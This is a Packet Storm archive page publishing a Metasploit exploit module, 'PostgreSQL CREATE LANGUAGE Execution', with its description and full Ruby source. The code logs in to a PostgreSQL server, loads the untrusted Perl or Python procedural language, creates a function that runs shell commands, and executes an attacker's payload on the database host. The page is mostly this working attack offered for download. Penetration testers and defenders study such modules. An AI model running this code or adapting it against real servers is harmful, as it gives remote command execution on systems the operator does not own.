Twenty Year Anniversary

PostgreSQL CREATE LANGUAGE Execution

PostgreSQL CREATE LANGUAGE Execution
Posted Apr 9, 2016
Authored by Micheal Cottingham, midnitesnake, Nixawk | Site metasploit.com

Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. Most commonly this is Perl and Python. When enabled, command execution is possible on the host. To execute system commands, loading the "untrusted" version of the language is necessary. This requires a superuser. This is usually postgres. The execution should be platform-agnostic, and has been tested on OS X, Windows, and Linux. This Metasploit module attempts to load Perl or Python to execute system commands. As this dynamically loads a scripting language to execute commands, it is not necessary to drop a file on the filesystem. Only Postgres 8 and up are supported.

tags | exploit, perl, python
systems | linux, windows, apple, osx
MD5 | 3c81d94f69a7a70e2c856b1c3cb07ab0

PostgreSQL CREATE LANGUAGE Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/postgres'

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Postgres
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
'Description' => %q(
Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
To execute system commands, loading the "untrusted" version of the language is necessary.
This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
and has been tested on OS X, Windows, and Linux.

This module attempts to load Perl or Python to execute system commands. As this dynamically loads
a scripting language to execute commands, it is not necessary to drop a file on the filesystem.

Only Postgres 8 and up are supported.
),
'Author' => [
'Micheal Cottingham', # author of this module
'midnitesnake', # the postgres_payload module that this is based on,
'Nixawk' # Improves the module
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
],
'Platform' => %w(linux unix win osx),
'Payload' => {
'PayloadType' => %w(cmd)
},
'Arch' => [ARCH_CMD],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 1 2016'))

deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
end

def postgres_major_version(version)
version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
version_match['major_version']
end

def check
if vuln_version?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def vuln_version?
version = postgres_fingerprint
if version[:auth]
major_version = postgres_major_version(version[:auth])
return true if major_version && major_version.to_i >= 8
end
false
end

def login_success?
status = do_login(username, password, database)
case status
when :noauth
print_error "#{peer} - Authentication failed"
return false
when :noconn
print_error "#{peer} - Connection failed"
return false
else
print_status "#{peer} - #{status}"
return true
end
end

def load_extension?(language)
case load_procedural_language(language, 'LANGUAGE')
when :exists
print_good "#{peer} - #{language} is already loaded, continuing"
return true
when :loaded
print_good "#{peer} - #{language} was successfully loaded, continuing"
return true
when :not_exists
print_status "#{peer} - #{language} could not be loaded"
return false
else
print_error "#{peer} - error occurred loading #{language}"
return false
end
end

def exec_function?(func_name)
query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')"
select_query = postgres_query(query)

case select_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_error "#{peer} - Exploit failed"
return false
when :complete
print_good "#{peer} - Exploit successful"
return true
else
print_error "#{peer} - Unknown"
return false
end
end

def create_function?(language, func_name)
load_func = ''

case language
when 'perl'
query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$"
query << "`$_[0]`;"
query << "$$ LANGUAGE pl#{language}u"
load_func = postgres_query(query)
when /^python(?:2|3)?/i
query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r"
query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r"
query << "$$ LANGUAGE pl#{language}u"
load_func = postgres_query(query)
end

case load_func.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_error "#{peer} Exploit failed"
return false
when :complete
print_good "#{peer} - Loaded UDF (exec_#{func_name})"
return true
else
print_error "#{peer} - Unknown"
return false
end
end

def load_procedural_language(language, extension)
query = "CREATE #{extension} pl#{language}u"
load_language = postgres_query(query)
return :loaded unless load_language.keys[0] == :sql_error

match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
return :exists if match_exists

match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
return :not_exists if match_error
end

def do_login(user, pass, database)
begin
password = pass || postgres_password
result = postgres_fingerprint(
db: database,
username: user,
password: password
)

return result[:auth] if result[:auth]
print_status "#{peer} - Login failed"
return :noauth

rescue Rex::ConnectionError
return :noconn
end
end

def exploit
return unless vuln_version?
return unless login_success?

languages = %w(perl python python2 python3)
languages.each do |language|
next unless load_extension?(language)
func_name = Rex::Text.rand_text_alpha(10)
next unless create_function?(language, func_name)
if exec_function?(func_name)
print_warning "Please clear extension [#{language}]: function [#{func_name}] manually"
break
end
end
postgres_logout if @postgres_conn
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close